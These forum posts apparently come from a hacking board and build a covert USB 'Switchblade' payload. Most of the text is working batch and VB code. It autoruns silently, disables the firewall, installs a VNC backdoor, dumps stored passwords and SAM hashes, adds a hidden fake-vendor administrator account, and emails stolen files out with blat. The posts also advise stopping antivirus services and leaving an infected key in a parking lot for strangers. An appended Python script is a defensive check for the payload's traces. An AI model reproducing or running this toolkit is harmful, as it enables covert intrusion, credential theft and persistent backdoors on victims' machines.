Posts posted by pseudobreed
-
Instead of just ending the batch, why not call a goto that will exec applications that have dumps that could have changed (i.e. Internet History/Passwords, Email Client, Messengers, Keylogs).
I do see what you are saying, no reason to pull off a full payload if you already have most of the info.
I added an update to the payload that downloads a new payload and dumps info that may have changed and emails it out using blat. I personally didn't want to chance plugging the drive in again, especially if it was physically difficult to get to the computer the first time.
If only I could get a good NAT-NAT connection going, then the backdoor VNC will come in handy much more when needing to remotely update the payload. At the moment, I'm limited to computers that are on the same network. Like the user who walks away from his computer to get a refill at the local "hot-spot."
I'm dropping Hamachi as an option. I started to write an app that grabbed the hwnd of applications so I could delete the system tray icons; however, Hamachi adds much more than just an icon, and I'm not sure if you can hide network adapters or not.
I'm going to check out OpenVPN now...
Once I get that going, I'm thinking about "losing" the key in a parking lot and having blat just email once the payload is pulled off. Would be kind of interesting to see where it travels. Unless someone puts it in a machine that has no internet connection, then formats the drive to keep as their own.
-
I remember there being a proof of concept of where you could RPC the Wireless Zero Configuration Service and it would drop WEP and WPA in clear text. And, you could do it without being under an admin account.
However, it only worked after the View Available Wireless Networks was opened.
In June, Microsoft issued a patch that actually changes the time it holds this info in the cache.
I didn't hear much about it after that, or even know if the exploit still works.
-
That's why I wrote the vbscript to just grab files based on a filter. I did not know how the files were going to get split and as long as the argument has a wildcard, the filename should get put into the array. That, and I had no idea what happens if you split a file over 101 parts...
The only problem I see is if the files that you want to send out begin the same as other files. However, this is an easy fix. Just name the data files something unique and include as much as you can as the argument with a * at the end.
-
arg !!!
are you ignoring my last post?
this will work, in fewer lines:
IF EXIST pwned.r00 GOTO send ELSE GOTO END
:hak1
set /a part=%part%+1
IF EXIST pwned.r%part% goto send else goto end
:send
blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
:: delete the evidence after sending
del pwned.r%part%
goto hak1
:end
exit
If you do decide to use this, you need to make some changes. WinRar splits files either by adding part# to the filename or creates a new file extension such as .r01, .r02, .r03, etc. depending on how the user wants to split files. Usually it's the latter. In either case it will always have a .rar extension for the first file.
So, in your code, you need to send the first .rar file, then go into your loop. Also, while in your loop you need to add a 0 to the file extension if the file number is below 10. I'm not sure what happens if you go into three digits, never had to split a file into that many chunks.
-
I thought about that, and it can be done in the registry.
Do not show System Files
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
Do not show Hidden Files
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000002
Or add this code to autoexec.bat in my payload
:: Hide Hidden and System Files
RECYCLER\nircmd.exe regsetval dword "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" "ShowSuperHidden" "0"
RECYCLER\nircmd.exe regsetval dword "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" "Hidden" "2"
-
The above code was from MD's vbscript, however, I used the same method to look for the drive.
I liked your idea so I redid my code and commented it.
I added the GetDriveType API to query the drive to find out what kind of drive it is. This does not spin up the CD-Rom drives. If the type is removable, then look for the file and execute it.
Option Explicit

' API Function to get type of Drive
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long

Private Sub Form_Load()
    Dim FSO As New FileSystemObject   ' File System Object
    Dim objDrive As Drive             ' Drive Object
    Dim lCurrDrive As Long            ' Current Drive Letter/Number
    Dim lDriveType As Long            ' Current Drive Type

    ' Begin loop to check each drive for removable drive
    For Each objDrive In FSO.Drives
        ' Convert current drive letter to ANSI
        lCurrDrive = Asc(objDrive.DriveLetter)
        ' Get drive type with API call (root path, e.g. "E:\")
        lDriveType = GetDriveType(Chr$(lCurrDrive) & ":\")
        ' 0: Unknown
        ' 1: Does Not Exist
        ' 2: Removable Drive
        ' 3: Fixed Drive
        ' 4: Remote Drive
        ' 5: CD-ROM Drive
        ' 6: RAM Drive
        ' If drive is removable, then look for the file
        If lDriveType = 2 Then
            If FSO.FileExists(objDrive.DriveLetter & ":\autorun.bat") Then
                ' Change directory path for shell call
                ChDrive objDrive.DriveLetter & ":"
                ' Exec autorun.bat
                Shell objDrive.DriveLetter & ":\autorun.bat"
                ' Clean up
                Set objDrive = Nothing
                Set FSO = Nothing
            End If
        End If
    Next
    ' Exit
    Unload Me
End Sub
And, the new file can be downloaded here.
-
Copy and paste the code into goodies.vbs
Call the VBScript on the command line:
cscript /nologo goodies.vbs {filename*}
It will blat out all the files that match the filename*. Use * as the wildcard. (ie. cscript /nologo goodies.vbs goodies* - This will send out every file in the folder that matches goodies.*, goodies.rar, goodies.r01, goodies.r02, etc.)
Set FSO = CreateObject("Scripting.FileSystemObject")
ReDim arrFiles(1)
Set Folder = FSO.GetFolder(".")
Set Files = Folder.Files

' Collect every file in the current folder whose name matches the filter argument
For Each File In Files
    If CheckFile(File.Name, WScript.Arguments(0)) Then
        If i > UBound(arrFiles) Then ReDim Preserve arrFiles(i*2)
        arrFiles(i) = File.Path
        i = i + 1
    End If
Next
ReDim Preserve arrFiles(i-1)

For Each FileName In arrFiles
    'WScript.Echo FileName
    blat.exe FileName -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
Next

' DOS-style wildcard match of Name against Filter (* and ? supported, "." handled like the shell)
Private Function CheckFile(ByVal Name, ByVal Filter)
    CheckFile = False
    FilterPos = 1
    NamePos = 1
    Do
        If FilterPos > Len(Filter) Then
            CheckFile = NamePos > Len(Name)
            Exit Function
        End If
        If Mid(Filter,FilterPos) = ".*" Then
            If NamePos > Len(Name) Then
                CheckFile = True
                Exit Function
            End If
        End If
        If Mid(Filter,FilterPos) = "." Then
            CheckFile = NamePos > Len(Name)
            Exit Function
        End If
        FilterCount = Mid(Filter,FilterPos,1)
        FilterPos = FilterPos + 1
        Select Case FilterCount
            Case "*"
                CheckFile = CheckFile2(Name,NamePos,Filter,FilterPos)
                Exit Function
            Case "?"
                If NamePos <= Len(Name) And Mid(Name,NamePos,1) <> "." Then NamePos = NamePos + 1
            Case Else
                If NamePos > Len(Name) Then Exit Function
                NameCount = Mid(Name,NamePos,1)
                NamePos = NamePos + 1
                If StrComp(FilterCount,NameCount,vbTextCompare) <> 0 Then Exit Function
        End Select
    Loop
End Function

' Handles the part of the filter after a "*": tries every remaining start position in Name
Private Function CheckFile2(ByVal Name, ByVal NamePos0, ByVal Filter, ByVal FilterPos0)
    FilterPos = FilterPos0
    Do
        If FilterPos > Len(Filter) Then
            CheckFile2 = True
            Exit Function
        End If
        FilterCount2 = Mid(Filter,FilterPos,1)
        FilterPos = FilterPos + 1
        If FilterCount2 <> "*" And FilterCount2 <> "?" Then
            Exit Do
        End If
    Loop
    If FilterCount2 = "." Then
        If Mid(Filter,FilterPos) = "*" Then
            CheckFile2 = True
            Exit Function
        End If
        If FilterPos > Len(Filter) Then
            CheckFile2 = InStr(NamePos0,Name,".") = 0
            Exit Function
        End If
    End If
    For NamePos = NamePos0 To Len(Name)
        NameCount = Mid(Name,NamePos,1)
        If StrComp(FilterCount2,NameCount,vbTextCompare) = 0 Then
            If CheckFile(Mid(Name,NamePos+1),Mid(Filter,FilterPos)) Then
                CheckFile2 = True
                Exit Function
            End If
        End If
    Next
    CheckFile2 = False
End Function
I didn't comment anything =/, so if you have any questions just ask and I'll explain.
Now you just have to fill in the credentials for blat and you should be good to go.
*Edit - Added argument option to script.
-
I'm not 100% sure what you are trying to do, however, you could check out Sourceforge for some inspiration. Maybe you can find what you are looking for and port the code.
-
It almost sounds like a custom rootkit. Nice.
srvany is the application that can turn a batch command into a service. Really easy to set up and I use it all the time. You just have to make sure that all registry settings and application info go into the 'All Users' profiles.
I could never get Blat to auth with Gmail. Gmail kept spitting an error back to me that I had to login a certain way (I can't remember the exact error off the top of my head). It doesn't accept the auth command that Blat gives off.
So, I just signed up with a free smtp host (inbox.com). It works out because if the user fires up ethereal and sees where the emails are going it really can not be traced back to me.
I'm going to look into what it takes to set up a bare bones SMTP server.
@Spider
If you set up a batch schedule with the at command the batch runs under the system account and therefore runs silently. The user never sees the console window. The same thing works if you use srvany to make a service or you could always call nircmd execcmd.
-
Oh yes, I like the service idea.
Just have to make sure the remote service is running, create your own that rar's and send the files out.
With Blat out of the picture, I'm not sure what you have left to use. I'm assuming you are just assuming the user only has ports 80, 110, 443 open? Or maybe you can port scan real quick to see what outs you have available...
Didn't I hear something over at sploit how some guy sent packets using ping? I'm going to look into that. And, I wonder how hard it is to make an SMTP server...
@Cooper
I can't remember the program, maybe firewalk or something, but you could actually ask the firewall what rules it had in place. On some firewalls (PIX for sure) it will allow traffic to pass through if it's in the DMZ. However, that's not a failsafe way of pulling it off. Getting the proxy information is easy as soon as you figure out what browser they are running. Then you could just piggyback over port 80. Unless SNORT is running on outgoing traffic as well.
-
Bah, free hosts are not what they used to be...
Here are links with YouSendIt (File should be available for 7 days)
Lets see if I can explain this.
The for statement in batch is pretty much like this:
for /F ["option"] {%% | %}variable in {'command'} do ()
/F
Tells the for statement to parse a file or command
["option"]
The tokens option says which tokens from each line are to be passed for each loop. So, I'm saying grab tokens 5 through 8. If the last character is an * then it keeps making variables until the remaining text on the line is parsed. (i.e. tokens=1-* would grab the whole line)
The delims state what to ignore.
{%% | %}variable
This is the replaceable variable(s). %% is to be used in batch files. % is for use at the command prompt. They are case-sensitive and you have to give it an alpha value, such as %a, %b, or %c. I started out with a, so it will create variables a, b, c, d, etc...
{'command'}
This is the command or file to parse.
Here is the FOR command in MSDN.
set
Creates a local variable until the batch ends.
/a
Tells the set command that we are using a math expression.
So, I took the mn variable (Minutes) and added 5 to it.
Then I checked to see if it was greater than 10. If it's less than 10, set only creates a single digit number. So, to fix this I just throw a 0 in front so the "at" command will accept the variable as double-digit minutes.
I hope that explains everything.
The only reason I used the sched is I didn't want to write an application that had a timer in it. I figured an application running all the time in the background is more noticeable than a task in the scheduler. Not many people actually look at their scheduler. The only fallback there is the task scheduler service has to be running, I found that out earlier. I'm going to include that fix along with the NAT-NAT connection in the next version.
I'm almost tempted to try and figure out what Hamachi does and set up a silent install that way. It would be really nice to just have a messenger-like app with all the computers listed and connected through a VPN. I do know on the install, it creates a network driver, then they do a NAT to NAT using their private servers...
-
boristsr has a very good point.
Programming is not about the language you choose. You first have to figure out how to solve problems and it really breaks down into being math equations.
When I started out, I never used to do it until I was forced to in college, but pseudocode works wonders. Essentially, once you figure out the problem the only thing you need to know after that is the syntax of the language you are going use.
I started out in BASIC, then VB and then learned C++ and Java in about a years time. Then I worked as a developer using VB for about three years.
VB = Rapid Application Development. It works to throw something together quickly however it is full of memory leaks and it does not clean up code well on its own (However, you can write your own cleanup). Anything you learn in C++ can be thrown into VB using classes, modules, etc. I don't think people give VB enough credit. I use it primarily considering my clients are on windows 90% of the time and I have a huge collection of modules, classes, and dl libraries from over the years.
C++ = Maybe it's just me, but it takes me about twice as long to do something in C++ than VB and making a GUI is hella a pain. And, I can not think of thing that I strictly need to make in C++ that I can not in VB.
Java = Awesome at OOP. However, it's so freaking slow on windows. It's great that it's cross platform, but like I said, I'm on windows.
PHP = Personally, I enjoy it the most. The only downfall is you need a web server (I use XAMPP). It's really easy to learn, it resembles C++ and Java a little bit more so it's not like learning another language all over again and it's fast. The best part I like about it is I can write an app and the client just needs a web browser to use it. It's not OS dependent. This way even people on their phones can get/post info.
All in all. Just jump into a language. If you feel it's a little awkward for your taste then try something else. When it comes down to it, you are going to code in what you feel comfortable in and what works for your style. Because you can pretty much solve any problem in any language if you are comfortable with it. If you're not comfortable with it, the chances are you are just going to forget about it anyways. Which is a good thing. Nothing like staring at some code knowing it's the correct syntax to only find out later on it's the correct syntax for a different language.
If I had to do it all over again, I would learn command line by heart first. Then you could start making scripts without a compiler and then learn the basics. Then step it up into VBScript or VB. You will find that most of what you learned in batch scripting will easily port into VBScript or VB. Then if you find that you are being held back, check out C#. I'm just not fancy on a computer having to have a 23mb framework to run a 20kb file.
Oh, and get a good IDE. I almost lost it when I tried Borland Compiler.
-
This all really depends on how sensitive the data is and what you want to do with it.
Do you just need to dump the info and come back later to go through it? Or, do you need to dump somewhere to parse and return something to somewhere?
-
Yeah, I don't care. That's why I posted the source. That and I didn't want anyone thinking I hid something in the exe.
Just keep the Guy Fawkes Mask icon going. =)
I didn't comment the exe file at all, if you have any questions just ask.
-
If I had to come up with something quick, I would:
-WinRar command line to split the files into chunks.
-Blat command line with some fake smtp account and email the chunks to another fake email address that you can log in from anywhere to get what you need.
-Batch it all up and use "at" to send when you need it sent. Since the default profile is system, it will run the batch silently.
However, I'm not sure how much someone will not notice... especially depending on the firewall and or av.
-
@moonlit
I found the best way to stop most AVs is just stop the service. Once the service is stopped, bring over the questioned files.
You can always set the service to disabled and not have to worry about it coming back up on startup.
I know Trend Micro and AntiVir both work this way. Since the service is under a system account, once it's stopped it kills the process too.
@therian16
You can use MD's vbscript.
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set colDrives = objFSO.Drives
For Each objDrive In colDrives
    If objFSO.FileExists(objDrive.DriveLetter & ":\wip\cmd\go.cmd") Then
        strPath = objDrive.DriveLetter & ":\wip\cmd"
        strcmd = """" & strPath & "\" & "go.cmd" & """"
        CreateObject("Wscript.Shell").CurrentDirectory = strPath
        CreateObject("Wscript.Shell").Run strcmd, 0, False
    End If
Next
You pretty much have to tell windows to find a file. Once it's found, assume that is your drive. The key is to have a unique file to search for. Or, at least in a unique place.
It's the same thing I did in the loader except I made it an exe in VB so I didn't have to see the console flash.
-
I've been playing around with this cruzer drive ever since I saw it on Hack a Day.
Here is my version...
First of all, all files have the system and hidden attributes set. Most non-savvy computer users have the hide system files checked by default. This adds discretion to the files.
Second of all, the files are located in the RECYCLER folder. This way if a user does see a hidden system folder, they would assume it's just the recycle bin on the drive (Even though removable disks do not have such a thing).
Cruzer Loader (Download):
Files Included:
- cruzer-autorun.iso
- LPInstaller.exe
The cruzer-autorun.iso only holds two files. One being the autorun.inf
[autorun]
open=autorun.exe
And, the other being an exe file. I really didn't like the vbscript way considering it pops up a console window for about a second. I just compiled the vbscript into an exe file using VB.
Private Sub Form_Load()
    Dim FSO As New FileSystemObject
    Dim objDrive As Drive
    For Each objDrive In FSO.Drives
        If FSO.FileExists(objDrive.DriveLetter & ":\autorun.bat") Then
            ChDrive objDrive.DriveLetter & ":"
            Shell objDrive.DriveLetter & ":\autorun.bat"
            Set objDrive = Nothing
            Set FSO = Nothing
        End If
    Next
    Unload Me
End Sub
This way when the CD autoruns, there is no console flash. It's nice and discreet. All that file does is look for autorun.bat on a disk, assumes it's the USB drive and executes it.
Cruzer Payload (Download):
The payload begins with the autoexec.bat
:: Do not show commands to console
@echo off
setlocal

:: Open Explorer (Only works from My Computer View, not Autorun Dialog Box)
::explorer %CD%

:: Dump Directory
set dumppath=RECYCLER\DUMP\%computername%\%username%

:: Make Directory from Computer Name\User
mkdir %dumppath%

:: Apply Attributes Hidden and System
attrib +h +s RECYCLER\DUMP

:: Turn Off Windows XP Firewall
netsh firewall set opmode disable

:: Setup VNC
regedit /s RECYCLER\ultravnc.reg
mkdir "%ProgramFiles%\UltraVNC"
xcopy RECYCLER\UltraVNC "%ProgramFiles%\UltraVNC" /D /E /C /I /H /F /R /Y
"%ProgramFiles%\UltraVNC\winvnc.exe" -reinstall

:: Set Services to Auto
RECYCLER\nircmd.exe service auto lanmanworkstation
RECYCLER\nircmd.exe service auto lanmanserver
RECYCLER\nircmd.exe service auto winvnc
RECYCLER\nircmd.exe service auto remoteregistry

:: Start Services
RECYCLER\nircmd.exe service start lanmanworkstation
RECYCLER\nircmd.exe service start lanmanserver
RECYCLER\nircmd.exe service start winvnc
RECYCLER\nircmd.exe service start remoteregistry

:: Enable ADMIN$ Share
RECYCLER\nircmd.exe regsetval dword "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters" "AutoSharewks " "1"

:: Port Probe
RECYCLER\ports.exe /sxml %dumppath%\ports.xml

:: Current Process List
RECYCLER\process.exe /stab %dumppath%\process.txt

:: Internet Explorer History
RECYCLER\iehv.exe /sxml %dumppath%\iehistory.xml

:: Internet Explorer Passwords
RECYCLER\iepv.exe /sxml %dumppath%\iepasswords.xml

:: Email Client Passwords
RECYCLER\mailpv.exe /sxml %dumppath%\mailpasswords.xml

:: Messenger Client Passwords
RECYCLER\mspass.exe /sxml %dumppath%\messengerpasswords.xml

:: Network Passwords
RECYCLER\netpass.exe /sxml %dumppath%\networkpasswords.xml

:: Protected Passwords
RECYCLER\pspv.exe /stab %dumppath%\protectedpasswords.txt

:: Services
RECYCLER\serviwin.exe /stab /services %dumppath%\services.txt

:: IP Info
ipconfig /all > %dumppath%\lan.txt

:: Get External IP
RECYCLER\wget.exe http://whatismyip.com
ren index.html wan.html
xcopy wan.html %dumppath% /H /C /Y
del wan.html /q

:: SAM Dump
:: fgdump will only dump to call folder
:: run fgdump, copy pwdump file to dumppath, then delete original
RECYCLER\fgdump.exe -c -s -r -h 127.0.0.1 -u %username% -p * >> 127.0.0.1.pwdump.log
xcopy *.pwdump %dumppath% /H /C /Y
xcopy 127.0.0.1.pwdump.log %dumppath% /H /C /Y
del *.pwdump /q
del 127.0.0.1.pwdump.log /q

:: Add User
net user SUPPORT password /add /fullname:"CN=Microsoft Corporation,L=Redmond,S=Washington" /comment:"This is a vendor's account for Support"
net localgroup Administrators SUPPORT /add
net accounts /maxpwage:unlimited

:: Hide SUPPORT from Windows XP Login Screen
RECYCLER\nircmd.exe regsetval dword "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" "SUPPORT" "0"

:: Delete MS's Support Account
net user SUPPORT_388945a0 /delete

:: Local Shares
net view 127.0.0.1 > %dumppath%\shares.txt

:: Copy Files for Remote Updates
xcopy RECYCLER\blat.dll %windir%\system32 /H /C /Y
xcopy RECYCLER\blat.exe %windir%\system32 /H /C /Y
xcopy RECYCLER\blat.lib %windir%\system32 /H /C /Y
xcopy RECYCLER\instsrv.exe %windir%\system32 /H /C /Y
xcopy RECYCLER\nircmd.exe %windir%\system32 /H /C /Y
xcopy RECYCLER\runsaver.ini %windir%\system32 /H /C /Y
xcopy RECYCLER\runsaver.scr %windir%\system32 /H /C /Y
xcopy RECYCLER\sched.bat %windir%\system32 /H /C /Y
xcopy RECYCLER\srvany.exe %windir%\system32 /H /C /Y
xcopy RECYCLER\unrar.exe %windir%\system32 /H /C /Y
xcopy RECYCLER\update.exe %windir%\system32 /H /C /Y
xcopy RECYCLER\wget.exe %windir%\system32 /H /C /Y

:: Schedule Update
:: Parse Time
for /f "tokens=5-8 delims=:. " %%a in ('echo/^|time') do (
    set hh=%%a
    set mn=%%b
    set ss=%%c
    set ds=%%d
)

:: Add 5 Minutes
set /a mn=mn+5

:: If Min is less than 10, add 0 to front
if %mn% LSS 10 set mn=0%mn%

:: Sched Next Update
at %hh%:%mn% %windir%\system32\sched.bat

:: Done
It's all commented, so I'm not going to explain what it all does.
In short, it grabs passwords, history, shares, sam, installs vnc on port 5900 with password 'password', adds a SUPPORT administrator account, places files in the system32 directory and schedules to be auto updated every hour. This way I can add more to the payload in the future. I also used fgdump instead of pwdump considering it doesn't send lsass.exe into a berserk mode forcing a shutdown.
Those of you who do not have a Cruzer, you can download the USB payload. The only difference is there is a root autorun.inf that will call the autoexec.bat and open up a windows explorer at the drive's root.
In the future I will want to add files that can pass through the AV. For now, I have Trend Micro and AntiVir and Trend Micro is the only thing that picks up the mailpv file. I would also want to add a keylogger that will auto email every hour using blat while it makes its updates. Right now I'm working on a way to set up a NAT to NAT connection so I don't have to worry about port forwarding the router on the remote machine when attempting to use UltraVNC. And, some type of discreet alert so that I know the dumping is complete (Maybe flash the clock on the system tray or something).
I also need to write something that parses all the dump files into a nice friendly interface. It would be much easier instead of having to open xml/text files. Now to use php for ease or vb for portability.
*Edit for spelling
**Edit to mention fgdump
USB Switchblade Development
in USB Hacks
Posted
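As an added, defender-side example that is not part of the original post, this Python script flags the host artifacts the payload above leaves behind: the account hidden via SpecialAccounts\UserList, the AutoShareWks and Explorer hidden-file values, and the helper tools copied into system32. It parses a regedit-style export and a system32 file list; both samples are constructed for the example and no live host is read.

```python
"""Added defender-side check for artifacts of the payload above (not the original
poster's code). Parses a constructed regedit export and a constructed system32
listing; nothing here touches a live host. Standard library only."""
import re

# Registry paths and values the batch file above writes. Value names are compared
# case-insensitively and stripped, because the script writes "AutoSharewks "
# (trailing space) while the documented value name is AutoShareWks.
SUSPECT_VALUES = {
    r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters":
        {"AutoShareWks": 1},                    # admin shares forced on
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced":
        {"ShowSuperHidden": 0, "Hidden": 2},    # system/hidden files hidden
}
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")
# Helper tools the payload copies into %windir%\system32 for its hourly update.
DROPPED_TOOLS = {"blat.exe", "blat.dll", "srvany.exe", "instsrv.exe", "nircmd.exe",
                 "sched.bat", "runsaver.scr", "unrar.exe", "update.exe", "wget.exe"}

_KEY_RE = re.compile(r"^\[(.+)\]$")
_DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{8})$')


def parse_reg_export(text):
    """Parse a .reg export into {key_lower: {value_name: int}} (dword values only)."""
    reg, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1).lower()      # key paths are case-insensitive
            reg.setdefault(current, {})
            continue
        m = _DWORD_RE.match(line)
        if m and current is not None:
            reg[current][m.group(1)] = int(m.group(2), 16)
    return reg


def find_indicators(reg, system32_files):
    """Return human-readable findings; an empty list means no indicator matched."""
    findings = []
    # Any account with UserList = 0 is hidden from the XP welcome screen.
    for name, data in reg.get(USERLIST_KEY.lower(), {}).items():
        if data == 0:
            findings.append(f"account hidden from login screen: {name}")
    for key, wanted in SUSPECT_VALUES.items():
        for present, data in reg.get(key.lower(), {}).items():
            for name, bad in wanted.items():
                if present.strip().lower() == name.lower() and data == bad:
                    findings.append(f"{key}\\{present.strip()} = {data}")
    dropped = sorted(DROPPED_TOOLS & {f.lower() for f in system32_files})
    if dropped:
        findings.append("payload tools in system32: " + ", ".join(dropped))
    return findings


# Constructed sample data shaped like the changes the batch file above makes.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"SUPPORT"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoSharewks "=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002
"""
SAMPLE_SYSTEM32 = ["kernel32.dll", "Blat.exe", "srvany.exe", "sched.bat", "notepad.exe"]

if __name__ == "__main__":
    for finding in find_indicators(parse_reg_export(SAMPLE_REG), SAMPLE_SYSTEM32):
        print("[!]", finding)
```

On a real host the same checks run against `reg export` output and a `dir %windir%\system32` listing; an AT job pointing at sched.bat and a RECYCLER\DUMP folder on removable media are the remaining artifacts to look for by hand.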
The AVKiller almost needs a thread by itself.
I tried it on one of my laptops running AntiVir and it did not kill it.
I'm not sure how discreet you are trying to make it, however, these are the things that popped up on me.
I use task scheduler/at all the time so when I noticed the new task scheduled it caught my eye. This only happens when you use it without the switch and I'm sure that is to gain system rights. A couple issues there, task schedule service has to be running and you have to have rights to the AT command.
Also, when I run 'avkill -a' from the command line about 4-5 console windows pop up on my start menu.
This laptop is running XP SP2 and AntiVir.
Here is some info on AntiVir that may help
Installed Directory:
C:\Program Files\AntiVir PersonalEdition Classic
Main Process:
C:\Program Files\AntiVir PersonalEdition Classic\avcenter.exe
Modules:
C:\Program Files\AntiVir PersonalEdition Classic\ccmainrc.dll
C:\Program Files\AntiVir PersonalEdition Classic\ccgrdrc.dll
Application Specific:
build.dat - Build Number
avewin32.dll - Search Engine
antivir.vdf - Virus Definitions
avcenter.exe - Control Center
avconfig.exe - Config Center
avscan.exe - Luke Filewalker
avpack32.dll - Archive Library
avguard.exe - AntiVir Guard
avgnflt.sys - Filter
sched.exe - Scheduler
update.exe - Updater
Services:
AntiVirService - AntiVir PersonalEdition Classic Guard
AntiVirScheduler - AntiVir PersonalEdition Classic Scheduler
If there is anything else I can provide that will help let me know.